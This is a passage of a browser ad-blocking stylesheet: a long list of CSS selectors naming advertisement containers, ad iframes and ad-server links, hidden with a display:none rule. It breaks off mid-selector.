AdBlock*/#FFN_Banner_Holder,#FFN_imBox_Container,#RadAd_Skyscraper,#ab_pointer,#adxLeaderboard,#bbccom_leaderboard,#center_banner,#dir_ads_site,#flashad,#footer_adcode,#hbBHeaderSpon,#hiddenHeaderSpon,#navbar_adcode,#p360-format-box,#rightAds,#rightcolumn_adcode,#rm_container,#tads table[align="center"][width="100%"],#tooltipbox[class^="itxt"],#top-advertising,#topMPU,#tracker_advertorial,#ve_threesixty_swf[name="ve_threesixty_swf"],.ad-now,.ad_marquee,.dfpad,.kLink span[id^="preLoadWrap"].preLoadWrap,.prWrap,[id^="ad_block"],[id^="adbrite"],[id^="dclkAds"],[id^="ew"][id$="_bannerDiv"],[id^="konaLayer"],[src*="sixsigmatraffic.com"],a[href^="http://ad."][href*=".doubleclick.net/"],a[href^="http://adserver.adpredictive.com"],div[class^="dms_ad_IDS"],div[id^="adKontekst_"],div[id^="google_ads_div"],div[id^="kona_"][id$="_wrapper"],div[id^="sponsorads"],div[id^="y5_direct"],embed[flashvars*="AdID"],iframe[id^="dapIfM"],iframe[id^="etarget"][id$="banner"],iframe[name^="AdBrite"],iframe[name^="google_ads_"],img[src^="http://cdn.adnxs.com"],script[src="//pagead2.googleadservices.com/pagead/show_ads.js"] + ins > ins > iframe,script[src="http://pagead2.googlesyndication.com/pagead/show_ads.js"] + ins > ins > iframe,table[cellpadding="0"][width="100%"] > * > * > * > div[id^="tpa"],#A9AdsMiddleBoxTop,#A9AdsOutOfStockWidgetTop,#A9AdsServicesWidgetTop,#ADNETwallBanner1,#ADNETwallBanner2,#ADSLOT_1,#ADSLOT_2,#ADSLOT_3,#ADSLOT_4,#ADSLOT_SKYSCRAPER,#ADVERTISE_HERE_ROW,#AD_CONTROL_22,#AD_CONTROL_28,#AD_CONTROL_29,#AD_CONTROL_8,#AD_ROW,#AD_Top,#AD_newsblock,#ADgoogle_newsblock,#ADsmallWrapper,#Ad160x600,#Ad300x250,#Ad3Left,#Ad3Right,#Ad3TextAd,#AdArea,#AdBanner_F1,#AdBar,#AdBar1,#AdBox2,#AdContainer,#AdContainerTop,#AdContentModule_F,#AdDetails_GoogleLinksBottom,#AdDetails_InsureWith,#AdFrame4,#AdHeader,#AdLeaderboardBottom,#AdLeaderboardTop,#AdMiddle,#AdMobileLink,#AdPopUp,#AdRectangle,#AdSenseDiv,#AdSenseResults1_adSenseSponsorDiv,#AdServer,#AdShowcase_F1,#AdSky23,#AdSkyscraper,#AdSpacing,#AdSponsor_SF,#AdSubsectionShowcase_F1,#AdTargetControl1_iframe,#AdTop,#AdTopLeader,#Ad_BelowContent,#Ad_Block,#Ad_Center1,#Ad_Right1,#Ad_RightBottom,#Ad_RightTop,#Ad_Top,#Adbanner,#Adrectangle,#AdsContent,#AdsRight,#AdsWrap,#Ads_BA_CAD,#Ads_BA_CAD2,#Ads_BA_CAD_box,#Ads_BA_SKY,#Ads_CAD,#Ads_OV_BS,#Ads_Special,#AdvertMPU23b,#AdvertPanel,#AdvertiseFrame,#Advertisement,#Advertisements,#Advertorial,#Advertorials,#AdvertsBottom,#AdvertsBottomR,#BANNER_160x600,#BANNER_300x250,#BANNER_728x90,#BannerAd,#BannerAdvert,#BigBoxAd,#BodyAd,#BotAd,#Bottom468x60AD,#ButtonAd,#ClickPop_LayerPop_Container,#CompanyDetailsNarrowGoogleAdsPresentationControl,#CompanyDetailsWideGoogleAdsPresentationControl,#ContentAd,#ContentAd1,#ContentAd2,#ContentAdPlaceHolder1,#ContentAdPlaceHolder2,#ContentAdXXL,#ContentPolepositionAds_Result,#CornerAd,#DartAd300x250,#DivAdEggHeadCafeTopBanner,#FIN_videoplayer_300x250ad,#FooterAd,#FooterAdContainer,#GOOGLE_ADS_47,#GoogleAd1,#GoogleAd2,#GoogleAd3,#GoogleAdsPlaceHolder,#GoogleAdsPresentationControl,#GoogleAdsense,#Google_Adsense_Main,#HEADERAD,#HOME_TOP_RIGHT_BOXAD,#HeaderAD,#HeaderAdsBlock,#HeaderAdsBlockFront,#HeaderBannerAdSpacer,#HeaderTextAd,#HeroAd,#HomeAd1,#HouseAd,#ID_Ad_Sky,#JobsearchResultsAds,#Journal_Ad_125,#Journal_Ad_300,#JuxtapozAds,#KH-contentAd,#LargeRectangleAd,#LeftAd,#LeftAd1,#LeftAdF1,#LeftAdF2,#LftAd,#LoungeAdsDiv,#LowerContentAd,#MPUAdSpace,#MainSponsoredLinks,#Meebo\:AdElement\.Root,#Nightly_adContainer,#NormalAdModule,#OpenXAds,#OverrideAdArea,#PREFOOTER_LEFT_BOXAD,#PREFOOTER_RIGHT_BOXAD,#PageLeaderAd,#PreRollAd,#RelevantAds,#RgtAd1,#RightAd,#RightBottom300x250AD,#RightNavTopAdSpot,#RightSponsoredAd,#SectionAd300-250,#SectionSponsorAd,#SideAdMpu,#SidebarAdContainer,#SkyAd,#SpecialAds,#SponsoredAd,#SponsoredLinks,#TL_footer_advertisement,#TOP_ADROW,#TOP_RIGHT_BOXAD,#Tadspacefoot,#Tadspacehead,#Tadspacemrec,#TextLinkAds,#ThreadAd,#Top468x60AD,#TopAd,#TopAdBox,#TopAdContainer,#TopAdDiv,#TopAdPos,#TopBannerAd,#VM-MPU-adspace,#VM-footer-adspace,#VM-header-adspace,#VM-header-adwrap,#XEadLeaderboard,#XEadSkyscraper,#YahooAdParentContainer,#_ads,#abHeaderAdStreamer,#about_adsbottom,#abovepostads,#ad-1000x90-1,#ad-120x600-sidebar,#ad-120x60Div,#ad-160x600,#ad-160x600-sidebar,#ad-250,#ad-250x300,#ad-300,#ad-300x250,#ad-300x250-1,#ad-300x250-sidebar,#ad-300x250Div,#ad-300x60-1,#ad-376x280,#ad-728,#ad-728x90,#ad-728x90-1,#ad-728x90-leaderboard-top,#ad-728x90-top0,#ad-ads,#ad-article,#ad-banner,#ad-banner-1,#ad-bigbox,#ad-billboard-bottom,#ad-block-125,#ad-bottom,#ad-bottom-wrapper,#ad-box,#ad-box-first,#ad-box-second,#ad-boxes,#ad-bs,#ad-buttons,#ad-colB-1,#ad-column,#ad-container,#ad-content,#ad-contentad,#ad-first-post,#ad-flex-first,#ad-footer,#ad-footprint-160x600,#ad-frame,#ad-front-footer,#ad-front-sponsoredlinks,#ad-fullbanner2,#ad-globalleaderboard,#ad-halfpage,#ad-header,#ad-header-728x90,#ad-horizontal-header,#ad-img,#ad-inner,#ad-label,#ad-leaderboard,#ad-leaderboard-1-container,#ad-leaderboard-bottom,#ad-leaderboard-container,#ad-leaderboard-spot,#ad-leaderboard-top,#ad-left,#ad-left-sidebar-ad-1,#ad-left-sidebar-ad-2,#ad-left-sidebar-ad-3,#ad-links-content,#ad-list-row,#ad-lrec,#ad-medium,#ad-medium-rectangle,#ad-medrec,#ad-middlethree,#ad-middletwo,#ad-module,#ad-mpu,#ad-mpu1-spot,#ad-mpu2,#ad-mpu2-spot,#ad-north,#ad-one,#ad-placard,#ad-placeholder,#ad-rectangle,#ad-right,#ad-right-sidebar-ad-1,#ad-right-sidebar-ad-2,#ad-righttop,#ad-row,#ad-side,#ad-side-text,#ad-sidebar,#ad-sky,#ad-skyscraper,#ad-slot-right,#ad-slug-wrapper,#ad-small-banner,#ad-space,#ad-special,#ad-splash,#ad-sponsors,#ad-spot,#ad-squares,#ad-story-bottom-out,#ad-story-right,#ad-target,#ad-target-Leaderbord,#ad-teaser,#ad-text,#ad-top,#ad-top-banner,#ad-top-text-low,#ad-top-wrap,#ad-tower,#ad-trailerboard-spot,#ad-two,#ad-typ1,#ad-unit,#ad-wrap,#ad-wrap-right,#ad-wrapper,#ad-wrapper1,#ad-yahoo-simple,#ad-zone-1,#ad-zone-2,#ad-zone-inline,#ad01,#ad02,#ad1006,#ad11,#ad125BL,#ad125BR,#ad125TL,#ad125TR,#ad125x125,#ad160x600,#ad160x600right,#ad1Sp,#ad2Sp,#ad300,#ad300-250,#ad300X250,#ad300_x_250,#ad300x100Middle,#ad300x150,#ad300x250,#ad300x250Module,#ad300x60,#ad300x600,#ad300x600_callout,#ad336,#ad336x280,#ad375x85,#ad468,#ad468x60,#ad468x60_top,#ad526x250,#ad600,#ad728,#ad728Mid,#ad728Top,#ad728Wrapper,#ad728top,#ad728x90,#ad728x90_1,#ad90,#adBadges,#adBanner,#adBanner10,#adBanner120x600,#adBanner160x600,#adBanner2,#adBanner3,#adBanner336x280,#adBanner4,#adBanner728,#adBanner9,#adBannerTable,#adBannerTop,#adBar,#adBelt,#adBlock125,#adBlockTop,#adBlocks,#adBottbanner,#adBox,#adBox11,#adBox16,#adBox350,#adBox390,#adCirc300X200,#adCirc_620_100,#adCol,#adColumn,#adCompanionSubstitute,#adComponentWrapper,#adContainer,#adContainer_1,#adContainer_2,#adContainer_3,#adDiv,#adDiv300,#adDiv728,#adFiller,#adFps,#adFtofrs,#adGallery,#adGoogleText,#adGroup1,#adHeader,#adHeaderTop,#adIsland,#adLB,#adLabel,#adLayer,#adLeader,#adLeaderTop,#adLeaderboard,#adMPU,#adMediumRectangle,#adMiddle0Frontpage,#adMiniPremiere,#adMonster1,#adOuter,#adPlaceHolderRight,#adPlacer,#adPosOne,#adRight,#adRight2,#adSPLITCOLUMNTOPRIGHT,#adSenseModule,#adSenseWrapper,#adServer_marginal,#adShortTower,#adSidebar,#adSidebarSq,#adSky,#adSkyscraper,#adSlider,#adSpace,#adSpace0,#adSpace1,#adSpace10,#adSpace11,#adSpace12,#adSpace13,#adSpace14,#adSpace15,#adSpace16,#adSpace17,#adSpace18,#adSpace19,#adSpace2,#adSpace20,#adSpace21,#adSpace22,#adSpace23,#adSpace24,#adSpace25,#adSpace3,#adSpace300_ifrMain,#adSpace4,#adSpace5,#adSpace6,#adSpace7,#adSpace8,#adSpace9,#adSpace_footer,#adSpace_right,#adSpace_top,#adSpacer,#adSpecial,#adSplotlightEm,#adSpot-Leader,#adSpot-banner,#adSpot-island,#adSpot-mrec1,#adSpot-sponsoredlinks,#adSpot-textbox1,#adSpot-widestrip,#adSpotAdvertorial,#adSpotIsland,#adSpotSponsoredLinks,#adSquare,#adStaticA,#adStrip,#adSuperAd,#adSuperPremiere,#adSuperSkyscraper,#adSuperbanner,#adTableCell,#adTag1,#adTag2,#adText,#adTextCustom,#adTextLink,#adText_container,#adTile,#adTop,#adTopContent,#adTopbanner,#adTopboxright,#adTower,#adUnit,#adWrapper,#adZoneTop,#ad_1,#ad_130x250_inhouse,#ad_160x160,#ad_160x600,#ad_190x90,#ad_2,#ad_3,#ad_300,#ad_300_250,#ad_300_250_1,#ad_300a,#ad_300b,#ad_300c,#ad_300x100_m_c,#ad_300x250,#ad_300x250_content_column,#ad_300x250_m_c,#ad_300x250m,#ad_300x90,#ad_4,#ad_468_60,#ad_468x60,#ad_5,#ad_728_foot,#ad_728x90,#ad_728x90_container,#ad_940,#ad_984,#ad_A,#ad_B,#ad_Banner,#ad_C,#ad_C2,#ad_D,#ad_E,#ad_F,#ad_G,#ad_H,#ad_I,#ad_J,#ad_K,#ad_L,#ad_M,#ad_N,#ad_O,#ad_P,#ad_YieldManager-300x250,#ad_YieldManager-728x90,#ad_adsense,#ad_after_navbar,#ad_anchor,#ad_area,#ad_banner,#ad_bannerManage_1,#ad_banner_top,#ad_banners,#ad_bar,#ad_bellow_post,#ad_bigsize_wrapper,#ad_block_1,#ad_block_2,#ad_bottom,#ad_box,#ad_box_colspan,#ad_box_top,#ad_branding,#ad_bs_area,#ad_buttons,#ad_center_monster,#ad_circ300x250,#ad_cna2,#ad_cont,#ad_container,#ad_container_0,#ad_container_marginal,#ad_container_side,#ad_container_sidebar,#ad_container_top,#ad_content_top,#ad_content_wrap,#ad_feature,#ad_firstpost,#ad_footer,#ad_frame,#ad_front_three,#ad_fullbanner,#ad_gallery,#ad_global_header,#ad_h3,#ad_haha_1,#ad_haha_4,#ad_halfpage,#ad_head,#ad_header,#ad_holder,#ad_horizontal,#ad_horseshoe_left,#ad_horseshoe_right,#ad_horseshoe_spacer,#ad_horseshoe_top,#ad_hotpots,#ad_in_arti,#ad_island,#ad_label,#ad_large_rectangular,#ad_lastpost,#ad_layer,#ad_layer2,#ad_leader,#ad_leaderBoard,#ad_leaderboard,#ad_leaderboard728x90,#ad_leaderboard_top,#ad_left,#ad_lnk,#ad_lrec,#ad_lwr_square,#ad_main,#ad_medium_rectangle,#ad_medium_rectangular,#ad_mediumrectangle,#ad_menu_header,#ad_message,#ad_middle,#ad_most_pop_234x60_req_wrapper,#ad_mpu,#ad_mpu300x250,#ad_mpuav,#ad_mrcontent,#ad_newsletter,#ad_overlay,#ad_place,#ad_play_300,#ad_rect,#ad_rect_body,#ad_rect_bottom,#ad_rectangle,#ad_rectangle_medium,#ad_related_links_div,#ad_related_links_div_program,#ad_replace_div_0,#ad_replace_div_1,#ad_report_leaderboard,#ad_report_rectangle,#ad_results,#ad_right,#ad_right_main,#ad_ros_tower,#ad_rr_1,#ad_script_head,#ad_sec,#ad_sec_div,#ad_sgd,#ad_sidebar,#ad_sidebar1,#ad_sidebar2,#ad_sidebar3,#ad_sky,#ad_skyscraper,#ad_skyscraper160x600,#ad_skyscraper_text,#ad_slot_leaderboard,#ad_slot_livesky,#ad_slot_sky_top,#ad_space,#ad_square,#ad_ss,#ad_table,#ad_term_bottom_place,#ad_text:not(textarea),#ad_thread_first_post_content,#ad_top,#ad_top_holder,#ad_tp_banner_1,#ad_tp_banner_2,#ad_txt,#ad_unit,#ad_vertical,#ad_wide,#ad_wide_box,#ad_widget,#ad_window,#ad_wrap,#ad_wrapper,#adaptvcompanion,#adbForum,#adbanner,#adbar,#adbig,#adbnr,#adboard,#adbody,#adbottom,#adbox,#adbox1,#adbox2,#adbutton,#adclear,#adcode,#adcode1,#adcode2,#adcode3,#adcode4,#adcolumnwrapper,#adcontainer,#adcontainer1,#adcontainerRight,#adcontainsm,#adcontent,#adcontent1,#adcontrolPushSite,#add_ciao2,#addbottomleft,#addiv-bottom,#addiv-top,#adfooter,#adfooter_728x90,#adframe:not(frameset),#adhead,#adhead_g,#adheader,#adhome,#adiframe1_iframe,#adiframe2_iframe,#adiframe3_iframe,#adimg,#adition_content_ad,#adlabel,#adlabelFooter,#adlayer,#adlayerContainer,#adlayer_back,#adlayerad,#adleaderboard,#adleaderboard_flex,#adleaderboardb,#adleaderboardb_flex,#adleft,#adlinks,#adlinkws,#adlrec,#admanager_leaderboard,#admid,#admiddle3center,#admiddle3left,#adposition,#adposition-C,#adposition-FPMM,#adposition1,#adposition2,#adposition3,#adposition4,#adrectangle,#adrectanglea,#adrectanglea_flex,#adrectangleb,#adrectangleb_flex,#adrig,#adright,#adright2,#adrighthome,#ads-250,#ads-468,#ads-area,#ads-block,#ads-bot,#ads-bottom,#ads-col,#ads-dell,#ads-footer,#ads-footer-inner,#ads-horizontal,#ads-indextext,#ads-leaderboard1,#ads-lrec,#ads-main,#ads-menu,#ads-middle,#ads-prices,#ads-rhs,#ads-right,#ads-sponsored-boxes,#ads-top,#ads-vers7,#ads-wrapper,#ads120,#ads125,#ads160left,#ads300,#ads300-250,#ads300Bottom,#ads300Top,#ads315,#ads336x280,#ads728,#ads728bottom,#ads728top,#ads790,#adsBox-460_left,#adsBox-dynamic-right,#adsBoxResultsPage,#adsContent,#adsDisplay,#adsDiv1,#adsDiv2,#adsDiv3,#adsDiv4,#adsDiv5,#adsDiv6,#adsDiv7,#adsHeader,#adsID,#ads_160,#ads_300,#ads_728,#ads_banner,#ads_belowforumlist,#ads_belownav,#ads_bottom,#ads_bottom_inner,#ads_bottom_outer,#ads_box,#ads_button,#ads_catDiv,#ads_container,#ads_footer,#ads_fullsize,#ads_halfsize,#ads_header,#ads_html1,#ads_html2,#ads_inner,#ads_lb,#ads_medrect,#ads_notice,#ads_right,#ads_right_sidebar,#ads_sidebar_roadblock,#ads_space,#ads_text,#ads_top,#ads_topbanner,#ads_watch_top_square,#ads_zone27,#adsbottom,#adsbox,#adsbox-left,#adsbox-right,#adscolumn,#adsd_contentad_r1,#adsd_contentad_r2,#adsd_contentad_r3,#adsd_topbanner,#adsd_txt_sky,#adsdiv,#adsection,#adsense,#adsense-2,#adsense-header,#adsense-new,#adsense-tag,#adsense-text,#adsense03,#adsense04,#adsense05,#adsense1,#adsenseLeft,#adsenseOne,#adsenseWrap,#adsense_article_left,#adsense_block,#adsense_box,#adsense_box_video,#adsense_inline,#adsense_leaderboard,#adsense_overlay,#adsense_placeholder_2,#adsenseheader,#adsensetopplay,#adsensewidget-3,#adserv,#adshometop,#adsimage,#adskinlink,#adsky,#adskyscraper,#adslider,#adslot,#adsmiddle,#adsonar,#adspace,#adspace-1,#adspace-300x250,#adspace-leaderboard-top,#adspace300x250,#adspaceBox,#adspaceBox300,#adspace_header,#adspace_leaderboard,#adspacer,#adsponsorImg,#adspot,#adspot-1,#adspot-149x170,#adspot-1x4,#adspot-2,#adspot-295x60,#adspot-2a,#adspot-2b,#adspot-300x110-pos-1,#adspot-300x125,#adspot-300x250-pos-1,#adspot-300x250-pos-2,#adspot-468x60-pos-2,#adspot-a,#adspot300x250,#adspot_220x90,#adspot_300x250,#adspot_468x60,#adspot_728x90,#adsquare,#adsright,#adstop,#adtab,#adtag_right_side,#adtagfooter,#adtagheader,#adtagrightcol,#adtaily-widget-light,#adtech_0,#adtech_1,#adtech_2,#adtech_3,#adtech_googleslot_03c,#adtech_takeover,#adtext,#adtop,#adtophp,#adtxt,#adv-300,#adv-leaderboard,#adv-left,#adv-masthead,#adv-middle,#adv-mpux,#adv-x36,#adv-x37,#adv-x38,#adv-x39,#adv-x40,#adv1,#adv300bottom { display:none !important; } #adv300top,#adv728,#adv_300,#adv_728,#adv_border,#adv_google_300,#adv_google_728,#adv_halfpage,#adv_halfpage_title,#adv_leaderboard,#adv_sky,#adv_top_banner_wrapper,#adver1,#adver2,#adver3,#adver4,#adver5,#adver6,#adver7,#advert-1,#advert-120,#advert-boomer,#advert-display,#advert-header,#advert-leaderboard,#advert-links-bottom,#advert-skyscraper,#advert-top,#advert1,#advertBanner,#advertContainer,#advertDB,#advertRight,#advertSection,#advert_125x125,#advert_250x250,#advert_box,#advert_home01,#advert_leaderboard,#advert_lrec_format,#advert_mid,#advert_mpu,#advert_mpu_1,#advert_right_skyscraper,#advert_sky,#advertbox,#advertbox2,#advertbox3,#advertbox4,#adverthome,#advertise,#advertise-here,#advertise-here-sidebar,#advertise-now,#advertise1,#advertiseHere,#advertisement1,#advertisement160x600,#advertisement3,#advertisement728x90,#advertisementHorizontal,#advertisementLigatus,#advertisementPrio2,#advertisementRight,#advertisementRightcolumn0,#advertisementRightcolumn1,#advertisementsarticle,#advertiser-container,#advertiserLinks,#advertisers,#advertising,#advertising-banner,#advertising-caption,#advertising-container,#advertising-control,#advertising-skyscraper,#advertising-top,#advertising2,#advertisingModule160x600,#advertisingModule728x90,#advertisingTopWrapper,#advertising_btm,#advertising_contentad,#advertising_horiz_cont,#advertisment,#advertismentElementInUniversalbox,#advertorial,#advertorial_red_listblock,#adverts,#adverts-top-container,#adverts-top-left,#adverts-top-middle,#adverts-top-right,#advertsingle,#advertspace,#advheader,#advsingle,#advt,#advtext,#advtop,#adwhitepaperwidget,#adwin_rec,#adwith,#adwords-4-container,#adwrapper,#adxBigAd,#adxMiddle5,#adxSponLink,#adxSponLinkA,#adxtop,#adxtop2,#adzbanner,#adzerk,#adzerk1,#adzerk2,#adzone,#adzoneBANNER,#adzoneheader,#afc-container,#affinityBannerAd,#after-content-ads,#after-header-ad-left,#after-header-ad-right,#after-header-ads,#agi-ad300x250,#agi-ad300x250overlay,#agi-sponsored,#alert_ads,#anchorAd,#annoying_ad,#ap_adframe,#ap_cu_overlay,#ap_cu_wrapper,#apiBackgroundAd,#apiTopAdWrap,#apmNADiv,#apolload,#araHealthSponsorAd,#area-adcenter,#area1ads,#article-ad,#article-ad-container,#article-box-ad,#articleAdReplacement,#articleLeftAdColumn,#articleSideAd,#article_ad,#article_ad_container,#article_box_ad,#articlead1,#articlead2,#asideads,#asinglead,#atlasAdDivGame,#awds-nt1-ad,#babAdTop,#banner-300x250,#banner-ad,#banner-ad-container,#banner-ads,#banner250x250,#banner300x250,#banner468x60,#banner728x90,#bannerAd,#bannerAdTop,#bannerAdWrapper,#bannerAd_ctr,#bannerAd_rdr,#banner_160x600,#banner_300_250,#banner_ad,#banner_ad_footer,#banner_ad_module,#banner_admicro,#banner_ads,#banner_advertisement,#banner_content_ad,#banner_topad,#bannerad,#bannerad2,#baseAdvertising,#basket-adContainer,#bbccom_mpu,#bbo_ad1,#bg-footer-ads,#bg-footer-ads2,#bg_YieldManager-160x600,#bg_YieldManager-300x250,#bg_YieldManager-728x90,#bigAd,#bigBoxAd,#bigad300outer,#bigadbox,#bigadframe,#bigadspot,#billboard_ad,#block-ad_cube-1,#block-openads-0,#block-openads-1,#block-openads-2,#block-openads-3,#block-openads-4,#block-openads-5,#block-spti_ga-spti_ga_adwords,#block-thewrap_ads_250x300-0,#block_advert,#block_advertisement,#blog-ad,#blog_ad_content,#blog_ad_opa,#blog_ad_right,#blog_ad_top,#blox-big-ad,#blox-big-ad-bottom,#blox-big-ad-top,#blox-halfpage-ad,#blox-tile-ad,#blox-tower-ad,#body_728_ad,#book-ad,#botad,#bott_ad2,#bott_ad2_300,#bottom-ad,#bottom-ad-container,#bottom-ad-tray,#bottom-ad-wrapper,#bottom-ads,#bottomAd,#bottomAdCCBucket,#bottomAdContainer,#bottomAdSense,#bottomAdSenseDiv,#bottomAds,#bottomAdvBox,#bottomContentAd,#bottomRightAd,#bottomRightAdSpace,#bottom_ad,#bottom_ad_area,#bottom_ad_unit,#bottom_ads,#bottom_banner_ad,#bottom_overture,#bottom_sponsor_ads,#bottom_sponsored_links,#bottom_text_ad,#bottomad,#bottomads,#bottomadsense,#bottomadwrapper,#bottomleaderboardad,#box-ad-section,#box-ads-small-1,#box-ads-small-2,#box-content-ad,#box-googleadsense-1,#box-googleadsense-r,#box1ad,#boxAd300,#boxAdContainer,#boxAdvert,#box_ad,#box_advertisment,#box_mod_googleadsense,#boxad1,#boxad2,#boxad3,#boxad4,#boxad5,#boxads,#bpAd,#bps-header-ad-container,#btnAds,#btnads,#btr_horiz_ad,#burn_header_ad,#button-ads-horizontal,#button-ads-vertical,#buttonAdWrapper1,#buttonAdWrapper2,#buttonAds,#buttonAdsContainer,#button_ad_container,#button_ad_wrap,#button_ads,#buttonad,#buy-sell-ads,#c4ad-Middle1,#c_ad_sb,#c_ad_sky,#caAdLarger,#catad,#category-ad,#cellAd,#channel_ad,#channel_ads,#ciHomeRHSAdslot,#circ_ad,#closeable-ad,#cmn_ad_box,#cmn_toolbar_ad,#cnnAboveFoldBelowAd,#cnnRR336ad,#cnnSponsoredPods,#cnnTopAd,#cnnVPAd,#col3_advertising,#colAd,#colRightAd,#collapseobj_adsection,#column4-google-ads,#comments-ad-container,#commercial_ads,#common_right_ad_wrapper,#common_right_lower_ad_wrapper,#common_right_lower_adspace,#common_right_lower_player_ad_wrapper,#common_right_lower_player_adspace,#common_right_player_ad_wrapper,#common_right_player_adspace,#common_right_right_adspace,#common_top_adspace,#comp_AdsLeaderboardTop,#companion-ad,#companionAd,#companionAdDiv,#companionad,#container-righttopads,#container-topleftads,#containerLocalAds,#containerLocalAdsInner,#containerMrecAd,#containerSqAd,#content-ad-header,#content-header-ad,#content-left-ad,#content-right-ad,#contentAd,#contentBoxad,#contentTopAds2,#content_ad,#content_ad_square,#content_ad_top,#content_ads_content,#content_box_300body_sponsoredoffers,#content_box_adright300_google,#content_lower_center_right_ad,#content_mpu,#contentad,#contentad_imtext,#contentad_right,#contentads,#contentinlineAd,#contents_post_ad,#contextad,#contextual-ads,#contextual-ads-block,#contextualad,#coverADS,#coverads,#ctl00_Adspace_Top_Height,#ctl00_BottomAd,#ctl00_ContentMain_BanManAd468_BanManAd,#ctl00_ContentPlaceHolder1_blockAdd_divAdvert,#ctl00_ContentRightColumn_RightColumn_Ad1_BanManAd,#ctl00_ContentRightColumn_RightColumn_Ad2_BanManAd,#ctl00_ContentRightColumn_RightColumn_PremiumAd1_ucBanMan_BanManAd,#ctl00_LHTowerAd,#ctl00_LeftHandAd,#ctl00_MasterHolder_IBanner_adHolder,#ctl00_TopAd,#ctl00_TowerAd,#ctl00_VBanner_adHolder,#ctl00__Content__RepeaterReplies_ctl03__AdReply,#ctl00_abot_bb,#ctl00_adFooter,#ctl00_advert_LargeMPU_div_AdPlaceHolder,#ctl00_atop_bt,#ctl00_cphMain_hlAd1,#ctl00_cphMain_hlAd2,#ctl00_cphMain_hlAd3,#ctl00_ctl00_MainPlaceHolder_itvAdSkyscraper,#ctl00_ctl00_ctl00_Main_Main_PlaceHolderGoogleTopBanner_MPTopBannerAd,#ctl00_ctl00_ctl00_Main_Main_SideBar_MPSideAd,#ctl00_dlTilesAds,#ctl00_m_skinTracker_m_adLBL,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayMiddle_pnlAffiliateAdvert,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayRight_pnlAffiliateAdvert,#ctl00_topAd,#ctrlsponsored,#cubeAd,#cube_ads,#cube_ads_inner,#cubead,#cubead-2,#currencies-sponsored-by,#custom-advert-leadboard-spacer,#dAdverts,#dItemBox_ads,#dart_160x600,#dc-display-right-ad-1,#dcadSpot-Leader,#dcadSpot-LeaderFooter,#dcol-sponsored,#defer-adright,#detail_page_vid_topads,#div-gpt-ad-1,#div-gpt-ad-2,#div-gpt-ad-3,#div-gpt-ad-4,#divAd,#divAdBox,#divAdWrapper,#divAdvertisement,#divBottomad1,#divBottomad2,#divDoubleAd,#divLeftAd12,#divLeftRecAd,#divMenuAds,#divWNAdHeader,#divWrapper_Ad,#div_ad_leaderboard,#div_video_ads,#dlads,#dni-header-ad,#dnn_adLeaderBoard2008,#dnn_ad_banner,#download_ads,#dp_ads1,#ds-mpu,#ds_ad_north_leaderboard,#editorsmpu,#em_ad_superbanner,#embedded-ad,#evotopTen_advert,#ex-ligatus,#exads,#extra-search-ads,#fb_adbox,#fb_rightadpanel,#featAds,#featuread,#featured-advertisements,#featuredAdContainer2,#featuredAds,#featured_ad_links,#feed_links_ad_container,#file_sponsored_link,#first-300-ad,#first-adlayer,#first_ad_unit,#firstad,#flAdData6,#fl_hdrAd,#flash_ads_1,#flexiad,#floatingAd,#floating_ad_container,#foot-ad-1,#footad,#footer-ad,#footer-ads,#footer-advert,#footer-adverts,#footer-sponsored,#footerAd,#footerAdDiv,#footerAds,#footerAdvertisement,#footerAdverts,#footer_ad,#footer_ad_01,#footer_ad_block,#footer_ad_container,#footer_ad_modules,#footer_ads,#footer_adspace,#footer_text_ad,#footerad,#footerads,#footeradsbox,#forum_top_ad,#four_ads,#fpad1,#fpad2,#fpv_companionad,#fr_ad_center,#frame_admain,#frnAdSky,#frnBannerAd,#frnContentAd,#front_ad728,#front_advert,#front_mpu,#ft-ad,#ft-ad-1,#ft-ad-container,#ft_mpu,#fullsizebanner_468x60,#fusionad,#fw-advertisement,#g_ad,#g_adsense,#ga_300x250,#galleries-tower-ad,#gallery-ad,#gallery-ad-m0,#gallery-random-ad,#gallery_ads,#game-info-ad,#gamead,#gameads,#gasense,#gglads,#global_header_ad_area,#gm-ad-lrec,#gmi-ResourcePageAd,#gmi-ResourcePageLowerAd,#goad1,#goads,#gooadtop,#google-ad,#google-ad-art,#google-ad-table-right,#google-ad-tower,#google-ads,#google-ads-bottom,#google-ads-header,#google-ads-left-side,#google-adsense-mpusize,#googleAd,#googleAdArea,#googleAds,#googleAdsSml,#googleAdsense,#googleAdsenseBanner,#googleAdsenseBannerBlog,#googleAdwordsModule,#googleAfcContainer,#googleSearchAds,#googleShoppingAdsRight,#googleShoppingAdsTop,#googleSubAds,#google_ad,#google_ad_container,#google_ad_inline,#google_ad_test,#google_ads,#google_ads_aCol,#google_ads_frame1,#google_ads_frame1_anchor,#google_ads_frame2,#google_ads_frame2_anchor,#google_ads_frame3,#google_ads_frame3_anchor,#google_ads_test,#google_ads_top,#google_adsense_home_468x60_1,#googlead,#googlead-sidebar-middle,#googlead-sidebar-top,#googlead2,#googleadbox,#googleads,#googleads_mpu_injection,#googleadsense,#googlesponsor,#gpt-ad-halfpage,#gpt-ad-rectangle1,#gpt-ad-rectangle2,#gpt-ad-skyscraper,#gpt-ad-story_rectangle3,#grid_ad,#gsyadrectangleload,#gsyadrightload,#gsyadtop,#gsyadtopload,#gtopadvts,#half-page-ad,#halfPageAd,#halfe-page-ad-box,#hd-ads,#hd-banner-ad,#hdtv_ad_ss,#head-ad,#head-ad-1,#head-banner468,#headAd,#head_ad,#head_advert,#headad,#header-ad,#header-ad-left,#header-ad-rectangle-container,#header-ad-right,#header-ad2010,#header-ads,#header-adspace,#header-advert,#header-advertisement,#header-advertising,#header-adverts,#header-banner-ad,#headerAd,#headerAdBackground,#headerAdContainer,#headerAdWrap,#headerAds,#headerAdsWrapper,#headerTopAd,#header_ad,#header_ad_728_90,#header_ad_container,#header_adcode,#header_ads,#header_advertisement_top,#header_flag_ad,#header_leaderboard_ad_container,#header_publicidad,#headerad,#headeradbox,#headerads,#headeradsbox,#headeradvertholder,#headeradwrap,#headline_ad,#headlinesAdBlock,#hiddenadAC,#hideads,#hl-sponsored-results,#hly_ad_side_bar_tower_left,#hly_inner_page_google_ad,#home-advert-module,#home-rectangle-ad,#home-top-ads,#homeMPU,#homeTopRightAd,#home_ad,#home_bottom_ad,#home_contentad,#home_feature_ad,#home_lower_center_right_ad,#home_mpu,#home_spensoredlinks,#homead,#homepage-ad,#homepageAdsTop,#homepageFooterAd,#homepage_right_ad,#homepage_right_ad_container,#homepage_top_ads,#hometop_234x60ad,#hor_ad,#horizad,#horizontal-banner-ad,#horizontal_ad,#horizonta